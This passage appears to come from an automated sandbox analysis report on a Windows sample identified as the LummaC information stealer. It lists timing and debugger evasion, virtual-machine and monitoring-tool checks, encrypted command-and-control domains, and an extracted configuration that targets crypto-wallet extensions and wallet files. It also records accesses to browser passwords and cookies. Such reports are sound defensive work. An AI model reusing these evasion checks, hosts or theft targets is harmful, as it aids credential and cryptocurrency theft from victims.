                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E01C0 second address: 52E01FD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB3DD280BBBh 0x00000008 jmp 00007FB3DD280BC3h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 leave 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB3DD280BC5h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E01FD second address: 52E0203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0203 second address: 52E0207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0B5E second address: 52E0B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0B62 second address: 52E0B7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0B7F second address: 52E0BC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB3DD3D95EEh 0x0000000f push eax 0x00000010 jmp 00007FB3DD3D95EBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB3DD3D95F5h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0BC7 second address: 52E0BED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB3DD280BBDh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0D82 second address: 52E0D9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0D9F second address: 52E0DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F09C4 second address: 52F09CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F09CA second address: 52F09CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F09CE second address: 52F0A49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a jmp 00007FB3DD3D95EAh 0x0000000f pushfd 0x00000010 jmp 00007FB3DD3D95F2h 0x00000015 jmp 00007FB3DD3D95F5h 0x0000001a popfd 0x0000001b popad 0x0000001c mov dword ptr [esp], ebp 0x0000001f jmp 00007FB3DD3D95EEh 0x00000024 mov ebp, esp 0x00000026 jmp 00007FB3DD3D95F0h 0x0000002b xchg eax, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FB3DD3D95F7h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0A49 second address: 52F0A80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 58h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB3DD280BBCh 0x0000000e xchg eax, esi 0x0000000f jmp 00007FB3DD280BC0h 0x00000014 mov esi, dword ptr [ebp+0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB3DD280BBAh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0A80 second address: 52F0A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0A84 second address: 52F0A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0A8A second address: 52F0A9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3DD3D95EDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0A9B second address: 52F0AAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop edi 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0AAD second address: 52F0B1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FB44D4C6EDBh 0x0000000f pushad 0x00000010 pushad 0x00000011 movzx esi, bx 0x00000014 jmp 00007FB3DD3D95EFh 0x00000019 popad 0x0000001a mov si, FB5Fh 0x0000001e popad 0x0000001f cmp dword ptr [7544459Ch], 05h 0x00000026 jmp 00007FB3DD3D95F2h 0x0000002b je 00007FB44D4DEF82h 0x00000031 jmp 00007FB3DD3D95F0h 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov dl, 95h 0x0000003c mov ebx, eax 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0BBB second address: 52F0BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0BBF second address: 52F0BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0C26 second address: 52F0C2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSpecial instruction interceptor: First address: B8FA21 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSpecial instruction interceptor: First address: C0A63B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe TID: 520Thread sleep time: -270000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exe TID: 520Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: 4KDKJjRzm8.exe, 4KDKJjRzm8.exe, 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1613444081.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614536555.00000000012C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1610641364.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513399465.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539387547.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1543528478.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565220310.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1613613036.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488231577.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000002.1614720928.000000000131E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488024931.0000000005CC6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696497155p
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: 4KDKJjRzm8.exe, 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1488289786.0000000005C63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: SICE
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeCode function: 0_2_009BE110 LdrInitializeThunk,0_2_009BE110

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: 4KDKJjRzm8.exeString found in binary or memory: bashfulacid.lat
                Source: 4KDKJjRzm8.exeString found in binary or memory: curverpluch.lat
                Source: 4KDKJjRzm8.exeString found in binary or memory: tentabatte.lat
                Source: 4KDKJjRzm8.exeString found in binary or memory: shapestickyr.lat
                Source: 4KDKJjRzm8.exeString found in binary or memory: talkynicer.lat
                Source: 4KDKJjRzm8.exeString found in binary or memory: slipperyloo.lat
                Source: 4KDKJjRzm8.exeString found in binary or memory: manyrestro.lat
                Source: 4KDKJjRzm8.exeString found in binary or memory: observerfry.lat
                Source: 4KDKJjRzm8.exeString found in binary or memory: wordyfindy.lat
                Source: 4KDKJjRzm8.exeBinary or memory string: o7Program Manager
                Source: 4KDKJjRzm8.exe, 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: o7Program Manager
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1565220310.000000000131E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1565309257.0000000005C24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: 4KDKJjRzm8.exe PID: 1460, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1610641364.000000000131E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1610641364.000000000131E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version["site
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1610641364.000000000131E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.walletpX
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.walletpX
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ekdiahmedfbieldgik","ez":"DAppPlay"},{"en":"ijmpgkjfkbfhoebgogflfebnmejmfbm","ez":"BitClip"},{"en":"lkcjlnjfpbikmcmbachjpdbijejflpcm","ez":"Steem Keychain"},{"en":"onofpnbbkehpmmoabgpcpmigafmmnjh","ez":"Nash Extension"},{"en":"bcopgchhojmggmffilplmbdicgaihlkp","ez":"Hycon Lite Client"},{"en":"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%9
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
